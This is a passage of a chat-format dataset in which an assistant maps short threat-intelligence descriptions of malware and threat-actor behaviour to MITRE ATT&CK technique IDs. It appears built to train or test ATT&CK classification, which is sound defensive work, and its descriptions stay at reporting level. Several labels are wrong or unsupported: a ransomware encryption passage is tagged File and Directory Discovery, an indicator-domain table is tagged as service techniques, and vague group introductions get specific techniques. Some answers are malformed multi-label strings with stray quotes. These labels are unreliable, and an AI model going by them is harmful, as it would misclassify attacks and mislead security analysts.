- "content": "Generally, the malware uses AutoIt or VBS scripts added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Persistence was established via a crontab entry for a non-root user. With the binary named to masquerade as a legitimate file on the system and placed in a hidden directory, a crontab entry was created with a @reboot line so the GoldMax binary would execute again upon system reboot. Additionally, the threat actor used the nohup command to ignore any hangup signals, and the process will continue to run even if the terminal session was terminated"
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can scan local network for open SMB."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable. As a result, there were additional stages and additional payloads that could inflict more damage to end systems"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon encrypts data using Base64 before being sent to the command and control server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a scheduled task to establish by executing a malicious payload every subsequent minute."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload is a 32-bit executable file that is used to encrypt files on the victim’s system to extort a ransom"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has lured targets to click on malicious links to gain execution in the target environment."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has been distributed via spearphishing emails with malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck encrypts the victims machine followed by asking the victim to pay a ransom."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The folder C:\\Users\\Public\\Administrador\\logs\\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sample(s) f1b2bc0831445903c0d51b390b1987597009cc0fade009e07d792e8d455f6db0 5cc62ad6baf572dbae925f701526310778f032bb4a54b205bada78b1eb8c479c DNS tbs1/tbs2.microsoftonline.services Domains 0ffice365[.]agency 0ffice365[.]life 0ffice365[.]services 0nedrive[.]agency corewindows[.]agency microsoftonline[.]agency onedrive[.]agency sharepoint[.]agency skydrive[.]agency skydrive[.]services Sample eb33a96726a34dd60b053d3d1048137dffb1bba68a1ad6f56d33f5d6efb12b97 DNS tvs1/tvs2.trafficmanager.live Domains akamaiedge[.]live akamaized[.]live akdns[.]live edgekey[.]live Table 7: Sample and Domain Associations The third cluster of domains had six different nameservers associated with them, but unlike the other two clusters, were all directly tied to each other"
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT/Linux security battleground"
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can create system services to aid in executing the payload."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to list local groups: \"net localgroup administrator >> %temp%\\download\""
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stage 1: A Master Boot Record (MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, here is a folder and a list of files created by picking the C:\\Windows\\system32\\TCPSVCS.exe executable as a source of data"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can delete old binaries on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The modules are signed by an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited” with serial numbers, copied from real Tencent certificates"
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuditCred uses XOR and RC4 to perform decryption on the code functions."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use `rundll32.exe` to load DLL from the command line."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used Trojans from underground hacker websites."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This most likely means there is some type of DLL hijacking going on by distributing a legitimate McAfee binary with MirageFox to load up the DLL properly into a legitimate looking process"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard can copy files to other machines on a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can identify installed security tools based on process names."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 dropped and executed tools used for password cracking, including Hydra and CrackMapExec."
- },
- {
- "role": "assistant",
- "content": "T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use port 995 for C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux uses crontab for persistence if it does not have root privileges."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It iterates over all possible Office <version> values for both Word and Excel <product> values. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The malware moves each located document into the AppData folder, inserts malicious Word or Excel macros into it using a Microsoft.Office.Interop object, and then moves the document back into its original folder. In the samples we analyzed, the injected macros were simple downloaders"
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker can modify registry values within the \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\" registry key."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements."
- },
- {
- "role": "assistant",
- "content": "T1591.004 - Identify Roles"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are"
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE has been obfuscated with hex-encoded strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MailSniper can be used to obtain account names from Exchange and Office 365 using the \"Get-GlobalAddressList\" cmdlet."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is worth noting at this point that the C2 IP address associated with the cosecman[]com domain appeared to selectively block one of our exit IPs during our research"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information about process integrity levels."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT has been distributed as HTA files with VBScript."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user: C:\\Documents and Settings\\\\Start Menu\\Programs\\Startup\\viso.exe This step establishes the persistence of the malware across reboots on the endpoint Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint The malware might perform this activity for a couple of reasons: Establish persistence for itself on the endpoint Establish persistence of another component of the malware on the endpoint Update itself on endpoint after a separate updater component downloads the update from the control server The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY can gather domain and workgroup information."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 6: Difference between a stock UPX packed file and the modified one A patch for UPX is available on ESET’s malware-research Github repository that allows unpacking Keydnap’s backdoor with the usual upx -d"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CallMe has the capability to download a file to the victim from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail can identify the current username on the victim system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS uses PowerShell for obfuscation and execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FruitFly saves itself with a leading \".\" to make it a hidden file."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Russia-linked Shuckworm group (aka Gamaredon, Armageddon) is continuing to conduct cyber-espionage attacks against targets in Ukraine. Over the course of recent months, Symantec’s Threat Hunter Team, a part of Broadcom Software, has found evidence of attempted attacks against a number of organizations in the country"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains Windows logon password details."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy exploits the vulnerability CVE-2012-0158 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions."
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has used PowerShell Empire for execution of malware."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used backdoors that can delete files used in an attack from an infected system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has conducted targeted surveillance against activists and bloggers."
- },
- {
- "role": "assistant",
- "content": "T1589 - Gather Victim Identity Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can exfiltrate locally stored data via its C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ftp may be abused by adversaries to transfer tools or files between systems within a compromised environment."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon creates a new service named “ntssrv” to execute the payload. Newer versions create the \"MaintenaceSrv\" and \"hdv_725x\" services."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Common TCP ports 80 and 443 are used to blend in with routine network traffic"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can used pipes to connect machines with restricted internet access to remote machines via other infected hosts."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest."
- },
- {
- "role": "assistant",
- "content": "T1608.004 - Drive-by Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can send files from a victim's machine to Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a simple one-byte XOR method to obfuscate values in the malware."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
